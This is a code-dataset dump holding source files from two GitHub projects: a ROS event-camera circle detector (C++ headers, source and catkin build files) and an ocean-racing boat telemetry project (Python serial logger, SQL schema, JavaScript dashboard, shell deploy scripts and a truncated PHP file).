"text": "#pragma once\n#include \"HEAR_math/Matrix3by3.hpp\"\n#include \"RotationMatrix3by3.hpp\"\n#include <opencv2/core/types.hpp>\n#include <iostream>\n#include <math.h>\n#include <eigen3/Eigen/Dense>\n#include \"HEAR_math/Vector3D.hpp\"\n#include \"HEAR_msg/Vector3DMsg.hpp\"\n#include <ros/ros.h>\n#include \"HEAR_core/InputPort.hpp\"\n#include \"HEAR_core/OutputPort.hpp\"\n#include \"HEAR_core/Block.hpp\"\n\nusing Eigen::MatrixXd;\n\nclass rotation_accelerometer : public Block\n{\n private:\n Port* _input_port_0;\n Port* _input_port_1;\n Port* _input_port_2;\n Port* _input_port_3;\n Port* _output_port;\n public:\n Vector3D<float> accelerometer_data,drone_orientation,rotated_unit_vector;\n RotationMatrix3by3 R_accelerometer_origin,R_drone_origin;\n Vector3D<float> rotated_acceleration;\n Vector3DMsg all_parameters;\n void process(DataMsg* t_msg, Port* t_port);\n Vector3D<float> Update_accelerometer_vector(MatrixXd);\n void update_rotation_matrices();\n rotation_accelerometer();\n enum ports_id {IP_0_IMU,IP_1_ROLL,IP_2_PITCH,IP_3_YAW,OP_0_DATA};\n \n\n enum receiving_channels {accelerometer,ch_roll,ch_pitch,ch_yaw};\n ~rotation_accelerometer();\n};"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.7647058963775635,
"avg_line_length": 41.5,
"blob_id": "8e1cf20025cb09efffea5034ea6641728dd8f888",
"content_id": "5c260502962a734fbd7aee1371829f2faed5bfd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 2,
"path": "/build/catkin_generated/installspace/davis_corner-msg-extras.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "set(davis_corner_MESSAGE_FILES \"msg/Corners.msg\")\nset(davis_corner_SERVICE_FILES \"\")\n"
},
{
"alpha_fraction": 0.7253414392471313,
"alphanum_fraction": 0.734446108341217,
"avg_line_length": 81.375,
"blob_id": "da76e483a29e24e4663c35e45e5f7f0fec5be7e4",
"content_id": "bb23b59f42ccd5c486fccf50abbe626f36cf8587",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 659,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 8,
"path": "/build/catkin_generated/pkg.develspace.context.pc.py",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# generated from catkin/cmake/template/pkg.context.pc.in\nCATKIN_PACKAGE_PREFIX = \"\"\nPROJECT_PKG_CONFIG_INCLUDE_DIRS = \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/devel/include\".split(';') if \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/devel/include\" != \"\" else []\nPROJECT_CATKIN_DEPENDS = \"hear_ros_bridge;cv_bridge;image_transport;roscpp;sensor_msgs;message_runtime;std_msgs\".replace(';', ' ')\nPKG_CONFIG_LIBRARIES_WITH_PREFIX = \"-lrosopencv_t\".split(';') if \"-lrosopencv_t\" != \"\" else []\nPROJECT_NAME = \"davis_corner\"\nPROJECT_SPACE_DIR = \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/devel\"\nPROJECT_VERSION = \"0.0.0\"\n"
},
{
"alpha_fraction": 0.7680412530899048,
"alphanum_fraction": 0.7680412530899048,
"avg_line_length": 47.5,
"blob_id": "dca96c72a2fb6e265550cdfd071695d11ae70ab3",
"content_id": "074090c4136645df54c0c1d3dcd10548676fcb38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 194,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 4,
"path": "/build/catkin_generated/installspace/davis_corner-msg-paths.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${davis_corner_DIR}/..\" \"msg\" davis_corner_MSG_INCLUDE_DIRS UNIQUE)\nset(davis_corner_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7022350430488586,
"alphanum_fraction": 0.7123287916183472,
"avg_line_length": 27.32653045654297,
"blob_id": "488390f20fea86c4f476904c67e1904aa3dbe99e",
"content_id": "dd0224b4232724350240ff9439da5afb4fab94bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1387,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 49,
"path": "/include/Circle_detector.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include <image_transport/image_transport.h>\n#include <cv_bridge/cv_bridge.h>\n#include <sensor_msgs/image_encodings.h>\n#include <opencv2/imgproc/imgproc.hpp>\n#include <opencv2/highgui/highgui.hpp>\n#include <opencv2/core/types.hpp>\n#include <cmath>\n#include \"std_msgs/Float32.h\"\n#include \"geometry_msgs/Point.h\"\n#include <sstream>\n#include <ros/ros.h>\n#include <iostream>\n#include \"medianFilter.hpp\"\n#include <opencv2/features2d.hpp>\n#include \"HEAR_core/InputPort.hpp\"\n#include \"HEAR_core/OutputPort.hpp\"\n#include \"HEAR_math/Vector2D.hpp\"\n#include \"HEAR_msg/Vector2DMsg.hpp\"\n#include \"HEAR_core/Block.hpp\"\n\nclass Circle_detector: public Block\n{\nprivate:\n Port* _output_port;\n\npublic:\n ros::NodeHandle nh_;\n ros::Publisher puby, pubx;\n image_transport::ImageTransport it_;\n image_transport::Subscriber image_sub_;\n float threshold;\n Vector2D<float> obj_pos;\n cv::Point2d _c_;\n Vector2DMsg pixel_location;\n std::vector<cv::Point2f> temp;\n const std::string OPENCV_WINDOW = \"Image window\";\n std::vector<cv::KeyPoint> keypoints;\n medianFilter* filter=new medianFilter();\n float point_of_interest;\n enum ports_id {OP_0_DATA};\n void process(DataMsg* t_msg, Port* t_port){};\n \n\n Circle_detector(ros::NodeHandle&);\n ~Circle_detector();\n\n void imageCb(const sensor_msgs::ImageConstPtr &msg);\n cv::SimpleBlobDetector::Params params;\n};"
},
{
"alpha_fraction": 0.6946107745170593,
"alphanum_fraction": 0.7005987763404846,
"avg_line_length": 61.625,
"blob_id": "343aef94854fc76872e2e5ff8529d586f369bec8",
"content_id": "be2f2642ed5fd26fd1d3126997447ca5abd12288",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 501,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 8,
"path": "/build/catkin_generated/pkg.installspace.context.pc.py",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# generated from catkin/cmake/template/pkg.context.pc.in\nCATKIN_PACKAGE_PREFIX = \"\"\nPROJECT_PKG_CONFIG_INCLUDE_DIRS = \"${prefix}/include\".split(';') if \"${prefix}/include\" != \"\" else []\nPROJECT_CATKIN_DEPENDS = \"hear_ros_bridge;cv_bridge;image_transport;roscpp;sensor_msgs;message_runtime;std_msgs\".replace(';', ' ')\nPKG_CONFIG_LIBRARIES_WITH_PREFIX = \"-lrosopencv_t\".split(';') if \"-lrosopencv_t\" != \"\" else []\nPROJECT_NAME = \"davis_corner\"\nPROJECT_SPACE_DIR = \"/usr/local\"\nPROJECT_VERSION = \"0.0.0\"\n"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.7764706015586853,
"avg_line_length": 85,
"blob_id": "d9ead411323b4ee72d2234319fd1d4db45193f53",
"content_id": "f0a4c7d1532fe1f131101dc3b2b9b86b8dd25958",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 1,
"path": "/build/catkin_generated/ordered_paths.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "set(ORDERED_PATHS \"/home/ku-t2/catkin_ws_eventcamera/devel/lib;/opt/ros/melodic/lib\")"
},
{
"alpha_fraction": 0.5638512372970581,
"alphanum_fraction": 0.5860478281974792,
"avg_line_length": 26.53174591064453,
"blob_id": "afc75eb5fd71ce125e1bd4f221b14dc9e938b5ab",
"content_id": "d699c612d906bda0cb68c6701cebb0a5860217fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3469,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 126,
"path": "/src/Circle_detector.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"Circle_detector.hpp\"\n\n\n\nCircle_detector::Circle_detector(ros::NodeHandle &main_nodehandle)\n : it_(nh_)\n{\n nh_=main_nodehandle;\n\n this->_output_port = new OutputPort(ports_id::OP_0_DATA, this);\n _ports = {_output_port};\n\n image_sub_ = it_.subscribe(\"/EventsImage\", 1000,&Circle_detector::imageCb, this);\n puby = nh_.advertise<std_msgs::Float32>(\"camera_provider_y\", 1000);\n pubx = nh_.advertise<std_msgs::Float32>(\"camera_provider_x\", 1000);\n //cv::namedWindow(OPENCV_WINDOW);\n\n params.filterByArea = true;\n params.minArea = 2500;\n params.maxArea = 3500;\n\n // Filter by Circularity\n params.filterByCircularity = true;\n params.minCircularity = 0.1;\n\n // Filter by Convexity\n params.filterByConvexity = false;\n params.minConvexity = 0.2;\n\n // Filter by Inertia\n params.filterByInertia = false;\n params.minInertiaRatio = 0.2;\n\n threshold = 10;\n}\n\nCircle_detector::~Circle_detector()\n{\n //cv::destroyWindow(OPENCV_WINDOW);\n}\n\nvoid Circle_detector::imageCb(const sensor_msgs::ImageConstPtr &msg)\n\n{\n cv_bridge::CvImagePtr cv_ptr;\n try\n {\n cv_ptr = cv_bridge::toCvCopy(msg, sensor_msgs::image_encodings::TYPE_8UC1);\n }\n catch (cv_bridge::Exception &e)\n {\n\n ROS_ERROR(\"cv_bridge exception: %s\", e.what());\n\n return;\n }\n cv::Mat imgOriginal = cv_ptr->image;\n\n cv::Mat blurred,im_with_keypoints;\n cv::GaussianBlur(imgOriginal, blurred, cv::Size(5, 5), 0, 0);\n cv::bitwise_not(blurred, blurred);\n cv::Ptr<cv::SimpleBlobDetector> detector = cv::SimpleBlobDetector::create(params);\n detector->detect(blurred, keypoints);\n cv::drawKeypoints(blurred, keypoints, im_with_keypoints, cv::Scalar::all(-1), cv::DrawMatchesFlags::DRAW_RICH_KEYPOINTS);\n std::cout<<keypoints.size()<<std::endl;\n\n std_msgs::Float32 msg_y;\n std_msgs::Float32 msg_x;\n\n if (keypoints.size() == 0)\n {\n std::cout << \"EMPTY KEYPOINTS\\n\";\n puby.publish(msg_y);\n pubx.publish(msg_x);\n Vector2DMsg output_msg;\n output_msg.data = obj_pos;\n this->_output_port->receiveMsgData((DataMsg*) &output_msg);\n }\n\n else\n {\n float std_dev;\n temp.push_back(keypoints[0].pt);\n\n if (temp.size() == 3)\n {\n std_dev = filter->getStdDev(temp);\n //std::cout << std_dev << std::endl;\n if (std_dev < threshold)\n {\n _c_.x = temp.back().x;\n _c_.y = temp.back().y;\n msg_y.data = _c_.y-130;\n msg_x.data = _c_.x-173;\n obj_pos.y = _c_.y-130;\n obj_pos.x = _c_.x-173;\n puby.publish(msg_y);\n pubx.publish(msg_x);\n Vector2DMsg output_msg;\n output_msg.data = obj_pos;\n this->_output_port->receiveMsgData((DataMsg*) &output_msg);\n }\n\n else\n {\n std::cout << \"standard dev too high\\n\";\n _c_ = filter->getMedian(temp, _c_);\n msg_y.data = _c_.y-130;\n msg_x.data = _c_.x-173;\n obj_pos.y = _c_.y-130;\n obj_pos.x = _c_.x-173;\n puby.publish(msg_y);\n pubx.publish(msg_x);\n point_of_interest = sqrt((pow(_c_.x, 2)) + (_c_.y, 2));\n Vector2DMsg output_msg;\n output_msg.data = obj_pos;\n this->_output_port->receiveMsgData((DataMsg*) &output_msg);\n }\n temp.erase(temp.begin());\n }\n }\n\n // cv::imshow(\"Original\", imgOriginal); //show the original image\n // cv::imshow(\"im_with_keypoints\", im_with_keypoints); \n // cv::waitKey(1);\n}\n"
}
] | 23 |
arsumukha/Discord_bot
|
https://github.com/arsumukha/Discord_bot
|
d9796dc1aa1c03442ed9be7027262f45851a1ed0
|
fa231d470c8b9fe8b2649ddb4df00035dd70ee88
|
6d7529c22c10fac9e5c1559f3a461b8927b58295
|
refs/heads/main
| 2023-02-13T15:55:43.544526 | 2021-01-16T03:08:14 | 2021-01-16T03:08:14 | 330,069,651 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.774545431137085,
"alphanum_fraction": 0.7818182110786438,
"avg_line_length": 60.11111068725586,
"blob_id": "d81f29acdc91ce46f6bd63e9282cb34df093b0e7",
"content_id": "79afc863e0cb19fc5b3ac80f360b36082f8bd3f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 550,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 9,
"path": "/README.md",
"repo_name": "arsumukha/Discord_bot",
"src_encoding": "UTF-8",
"text": "# Discord_bot\nWeather bot for discord using python\nHello this is a discord bot for weather data.\nThe token id are saved in an .env file for security reasons ,please store your token Id in an .env or embed it directly in the python code .\nThe main.py is the discord chat bot program it uses discord modules and openweather api .\nThe keepalive.py is a program for webserver for accepting requests it uses flask to make it .\n\nFor Keeping the discord bot working 24/7 :\nuse uptimerobot.com -> for keeping server alive with a call interval every 5 mins .\n"
},
{
"alpha_fraction": 0.6179120540618896,
"alphanum_fraction": 0.6253312230110168,
"avg_line_length": 33.94444274902344,
"blob_id": "2c1910735e35037af5418281a9b6f1d736562c28",
"content_id": "6c4213e229614fa80d0b876a7bf7dd929e88d705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1887,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 54,
"path": "/main.py",
"repo_name": "arsumukha/Discord_bot",
"src_encoding": "UTF-8",
"text": "import discord\nimport os\nimport requests, json \nfrom keep_alive import keep_alive\n\nfrom datetime import datetime\nimport pytz\n\napi_key = os.getenv('TOKENS')\nbase_url = \"http://api.openweathermap.org/data/2.5/weather?\"\n\ntz_NY = pytz.timezone('Asia/Kolkata') \nnow = datetime.now(tz_NY)\n\ntimes = now.strftime(\"%m/%d/%Y, %H:%M:%S\")\nclient = discord.Client()\[email protected]\nasync def on_ready():\n print('we have logged in as {0.user}'.format(client))\n\[email protected]\nasync def on_message(message):\n if message.author==client.user:\n return\n if message.content.startswith(\"$time\"):\n await message.channel.send(times+\" IST\")\n if message.content.startswith(\"$help\"):\n await message.channel.send(\"Welcome to my app use $weather city_name to get the weather updates.Thank you\")\n if message.content.startswith('$weather'):\n city=message.content.split(\" \")\n city_name = city[1]\n complete_url = base_url + \"appid=\" + api_key + \"&q=\" + city_name\n response = requests.get(complete_url)\n x = response.json() \n if x[\"cod\"] != \"404\":\n y = x[\"main\"]\n current_temperature = y[\"temp\"]\n current_pressure = y[\"pressure\"]\n current_humidiy = y[\"humidity\"]\n z = x[\"weather\"]\n weather_description = z[0][\"description\"]\n await message.channel.send(\"Place=\"+city_name+\" \\nTemperature (in kelvin unit) = \" +\n str(current_temperature) + \n \"\\n atmospheric pressure (in hPa unit) = \" +\n str(current_pressure) +\n \"\\n humidity (in percentage) = \" +\n str(current_humidiy) +\n \"\\n description = \" +\n str(weather_description)+\n \"\\n Temperature in celsius =\" +str(round(int(current_temperature)-273.15,2))) \n else:\n await message.channel.send(\"format for weather code is '$weather city'\")\nkeep_alive()\nclient.run(os.getenv('TOKEN'))\n"
}
] | 2 |
OceanosTeam/Monaco2019
|
https://github.com/OceanosTeam/Monaco2019
|
d759cdcaa461f125d3aecd0255d2f42c45ebfeb4
|
d75fdc6f63e6c9e283d205b881d8aa06e1f61bc6
|
61428d27cebe8f08e9aad7aaf9b003c06f03e8a5
|
refs/heads/master
| 2022-05-02T12:03:45.331781 | 2022-03-31T00:13:29 | 2022-03-31T00:13:29 | 190,352,735 | 0 | 2 |
Apache-2.0
| 2019-06-05T08:06:04 | 2019-07-02T13:30:11 | 2019-07-02T22:39:58 |
JavaScript
|
[
{
"alpha_fraction": 0.7962962985038757,
"alphanum_fraction": 0.7962962985038757,
"avg_line_length": 53,
"blob_id": "df6e2dcea3cb3ca960ad54941e8b0e8c2902ea33",
"content_id": "258d40c11dd42207fdeecc0c3e2303b1e782698e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 54,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 1,
"path": "/communication/CAN/arduino_code/README.md",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "# Arduino code for Kelly KLS controller CAN data read\n"
},
{
"alpha_fraction": 0.746300220489502,
"alphanum_fraction": 0.7610993385314941,
"avg_line_length": 17.920000076293945,
"blob_id": "9ae862c27c854e6e717e3f144b0b3429c080bf84",
"content_id": "4a2121493155d4291ce6c7b3b79288bad52192d5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 473,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 25,
"path": "/communication/CAN/SerialLog/test.py",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\n\nimport time\nimport serial\nfrom serial import Serial\nfrom datetime import datetime\nimport struct\nimport sys\n# from collections import namedtuple\nimport numpy as np\nimport mysql.connector as sql\nfrom scipy import interpolate\n\n\nVdata = np.genfromtxt('oceanos_cell_discharge_capacity_14s.csv', dtype=float, delimiter=',', names=True)\nvx = Vdata['voltage']\nvy = Vdata['Percentage']\nf = interpolate.interp1d(vx, vy)\n\n# print(vx)\n\nenergy = f(57.0)\n\n\nprint(energy)\n"
},
{
"alpha_fraction": 0.5928143858909607,
"alphanum_fraction": 0.6187624931335449,
"avg_line_length": 16.034482955932617,
"blob_id": "098c89a0f9f5dd9d2f055a245bc78b919b94f2ae",
"content_id": "344f4381adb69bbe057f6f034bd4d23669c5c0b9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 501,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 29,
"path": "/dashboard/motor/graph.js",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "var presets = window.chartColors;\nvar utils = Samples.utils;\nvar inputs = {\n\tmin: 0,\n\tmax: 100,\n\tcount: 0,\n\tdecimals: 2,\n\tcontinuity: 1\n};\n\nnew Chart('chart-false', {\n\ttype: line,\n\tdata: [{\n\t\tlabels: 'Temperature2',\n\t\tdatasets: [{\n\t\t\tbackgroundColor: utils.transparentize(preset.red),\n\t\t\tborderColor: presets.red,\n\t\t\tdata: [1,2,3,4,5],\n\t\t\tlabel: 'Temperature',\n\t\t\tfill: boundary\n\t\t}]\n\t},\n\toptions: Chart.helpers.merge(options, {\n\t\ttitle: {\n\t\t\ttext: 'WHAT IS THIS\",\n\t\t\tdisplay: true\n\t\t}\n\t})\n});\n\t \n\t\t \n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.7071428298950195,
"avg_line_length": 27,
"blob_id": "2b27d6c1cfb8318deb1c57a61596781b50732aa6",
"content_id": "7e3e4131bf73d1ac0f63cf4209adcf42bbbd5ce7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 140,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 5,
"path": "/deploy.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/bash\n\n\n\nssh -p 65002 [email protected] 'cd ./Monaco2019; git pull origin master; cd ./database/tools; ./db_installer.sh'\n"
},
{
"alpha_fraction": 0.5447570085525513,
"alphanum_fraction": 0.572890043258667,
"avg_line_length": 31.58333396911621,
"blob_id": "590a1fc3b4834868233dd89f715d7bc98e1668e0",
"content_id": "211f170be51dec5f02bccb1238fac7170bd0bf53",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 391,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 12,
"path": "/database/sql/gps.sql",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "-- ---------------------------\n-- Table structure for gps\n-- ---------------------------\nCREATE TABLE IF NOT EXISTS `gps` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `Latitude` DECIMAL(8,6) DEFAULT '0',\n `Longitude` DECIMAL(8,6) DEFAULT '0',\n `Speed` DECIMAL(4,2) DEFAULT '0',\n `Time` TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n `serverSideName` VARCHAR(15) DEFAULT 'gps',\n PRIMARY KEY (`id`)\n);\n"
},
{
"alpha_fraction": 0.4507462680339813,
"alphanum_fraction": 0.46268656849861145,
"avg_line_length": 21.33333396911621,
"blob_id": "053d79c5fa616766aa72a934e28638d58742d728",
"content_id": "ac85158218b7419856d5f9e76cbde90dbae86a58",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 335,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 15,
"path": "/dashboard/motor/motor.js",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "var Motor;\nsetInterval(function() {\n $.ajax({\n type: \"GET\",\n url: \"motor.php\",\n dataType: \"JSON\",\n fail: function(e){\n console.log(\"FAILED\");\n },\n success: function(response) {\n Motor = response;\n speed_gauge.refresh(Motor.RPM);\n }\n });\n}, 1000);\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 12,
"blob_id": "a71436ba9035a9d878f9ecf2cead1aea5a7bd6e3",
"content_id": "b4cceab9062121c1b542443e7b39406f9498a42a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 156,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 12,
"path": "/communication/SIM7600X/GPS/GPSloc.h",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#ifndef gpsloc_h\n#define gpsloc_h\n\nclass GPSloc{\npublic:\n\t float Lat,Log,Speed;\n\tGPSloc();\n\tGPSloc(float lat,float log,float speed);\n\t~GPSloc();\n};\n\n#endif\n"
},
{
"alpha_fraction": 0.6194968819618225,
"alphanum_fraction": 0.652515709400177,
"avg_line_length": 36.411766052246094,
"blob_id": "3466a4f89b38c6b39e1380dd4832e280719d2509",
"content_id": "2339f68a2b011bc6be3de70f6ae5506560e85a2a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 636,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 17,
"path": "/communication/SIM7600X/GPS/writer.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "load_file () {\n. $1\n}\n$ONHOST=\"sql126.main-host.eu\"\n$ONUSER=\"u322154547_root\"\n$ONDB=\"test\"\n$ONPASS=\"oceanos_2019\"\nCONF=\"./database_installer.rc\"\nload_file $CONF\nMYDB=\"$MYSQLPATH -h $OCDBHOST -u $OCUSER -D $OCDB --password=$OCPASS\"\nONLINEDB=\"$MYSQLPATH -h $ONBHOST -u $ONUSER -D $ONDB --password=$ONPASS\"\n\nif [ $1 -eq 1 ]; then\n\t$MYDB < reset_gps.sql &> /dev/null\nfi\nmysql --user=$OCUSER --database=$OCDB --password=$OCPASS -e \"INSERT INTO gps (Latitude, Longitude, Speed) VALUES ('$2', '$3', '$4');\"\nmysql --user=$ONUSER --database=$ONDB --password=$ONPASS -e \"INSERT INTO gps (Latitude, Longitude, Speed) VALUES ('$2', '$3', '$4');\"\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.7008547186851501,
"avg_line_length": 23.526315689086914,
"blob_id": "1ffd98468fdda60df649cb9e69812cdb9a3f7589",
"content_id": "c8dc3d7dd6b5a21217740ee99e30f27cb30f1630",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 19,
"path": "/communication/SIM7600X/GSM/cosmote_crawler.py",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "import urllib.request as urll \nimport re\n\nlink = 'http://myinternet.cosmote.gr/main'\nlink = 'file:///home/pi/Desktop/cosmote.html'\nf = urll.urlopen(link)\nmyfile = f.read()\nmyfile = str(myfile, 'latin-1')\n\nstring = '<span class=\"customClassTotalDataBalance\"></span>'\n\nmatches = re.findall(string, myfile);\nfirst = re.search(string, myfile).start()\nlast = first+len(string)\nnewstring = ''\nfor i in range(20):\n\tnewstring+=myfile[last+i]\n\nprint(newstring.split('<')[0])\n\n\n"
},
{
"alpha_fraction": 0.490285724401474,
"alphanum_fraction": 0.5497142672538757,
"avg_line_length": 33.10389709472656,
"blob_id": "1d24d92b016ec05199165726dce1cafe1d2d62cd",
"content_id": "03b558eafa8716f4ae52d6ad335dc05023f689d7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2626,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 77,
"path": "/dashboard/include/buttons.js",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "var redIcon = L.icon({\n iconUrl: '../include/assets/start.png',\n iconSize: [50, 50], // size of the icon\n});\nvar yellowIcon = L.icon({\n iconUrl: '../include/assets/buoy.png',\n iconSize: [25, 25], // size of the icon\n});\nvar mymap;\n$(\"#nav-btn a\").click(function(){\n $(\"#overlay-nav\").fadeToggle(200);\n $(this).toggleClass('btn-open-nav').toggleClass('btn-close-nav');\n});\n$(\"#map-btn a\").click(function(){\n $(\"#overlay-map\").fadeToggle(200);\n $(this).toggleClass('btn-open-map').toggleClass('btn-close-map');\n var center = [43.734344, 7.435083];\n mymap = L.map('mapid',{\n center: center,\n zoom: 16\n /*\n maxBounds: [\n //south west\n [43.734344, 7.435083],\n //north east\n [53.734344, 7.035083]\n ],*/\n })\n L.tileLayer('https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}.png?access_token=pk.eyJ1IjoibWFwYm94IiwiYSI6ImNpejY4NXVycTA2emYycXBndHRqcmZ3N3gifQ.rJcFIG214AriISLbB6B5aw', {\n maxZoom: 18,\n attribution: 'Map data © <a href=\"https://www.openstreetmap.org/\">OpenStreetMap</a> contributors, ' +\n '<a href=\"https://creativecommons.org/licenses/by-sa/2.0/\">CC-BY-SA</a>, ' +\n 'Imagery © <a href=\"https://www.mapbox.com/\">Mapbox</a>',\n id: 'mapbox.streets'\n }).addTo(mymap);\n var start = [43.734344, 7.435083];\n var buoys = [[43.72915, 7.435384],[43.737631, 7.453043],[43.73884, 7.441092]];\n L.marker(start, {icon: redIcon}).addTo(mymap).bindPopup(\"<b>Starting Line</b>\");\n for (var key in buoys) {\n L.marker(buoys[key], {icon: yellowIcon}).addTo(mymap).bindPopup(\"<b>Buoy N\"+(parseInt(key)+1).toString()+\"</b>\");\n };\n L.circle([43.734344, 7.435083], 200, {\n color: 'red',\n fillColor: '#f03',\n fillOpacity: 0.5\n }).addTo(mymap).bindPopup(\"I am a circle.\");\n var latlngs = [\n start,\n buoys[0],\n buoys[1],\n buoys[2],\n start\n ];\n\n var polyline = L.polyline(latlngs, {color: 'red'}).addTo(mymap);\n //map.fitBounds(polyline.getBounds());\n var popup = L.popup();\n function onMapClick(e) {\n popup\n .setLatLng(e.latlng)\n .setContent(\"You clicked the map at \" + e.latlng.toString())\n .openOn(mymap);\n }\n\n mymap.on('click', onMapClick);\n});\n /*\n$('#overlay-nav').on('click', function(){\n $(\"#overlay-nav\").fadeToggle(200); \n $(\".button a\").toggleClass('btn-open').toggleClass('btn-close');\n open = false;\n});\n$('#overlay-map').on('click', function(){\n $(\"#overlay-map\").fadeToggle(200); \n $(\".button a\").toggleClass('btn-open').toggleClass('btn-close');\n open = false;\n});*/"
},
{
"alpha_fraction": 0.6461158990859985,
"alphanum_fraction": 0.6559802889823914,
"avg_line_length": 29.037036895751953,
"blob_id": "af05b09862867bb008abaa77647d175aa169e5cd",
"content_id": "09227d100b96ca86e78d5c677e1719fb95ba49de",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1623,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 54,
"path": "/dashboard/motor/motor.php",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "<?php\n/*\n\tCopyright (C) 2019 Oceanos NTUA Team\n\n\tThis program is free software: you can redistribute \n\tit and/or modify it under the terms of the GNU General Public License \n\tas published by the Free Software Foundation, either version 3 of the \n\tLicense, or (at your option) any later version.\n\n\tThis program is distributed in the hope that it will be useful,\n\tbut WITHOUT ANY WARRANTY; without even the implied warranty of\n\tMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n\tGNU General Public License for more details.\n\n\tYou should have received a copy of the GNU General Public License\n\talong with this program. If not, see <http://www.gnu.org/licenses/>.\n\n\tYou can contact Técnico Solar Boat by email at: [email protected]\n or via our facebook page at https://fb.com/tecnico.solarboat \n*/\n\n$DB_HOST = 'localhost';\n$DB_NAME = 'test';\n$DB_USER = 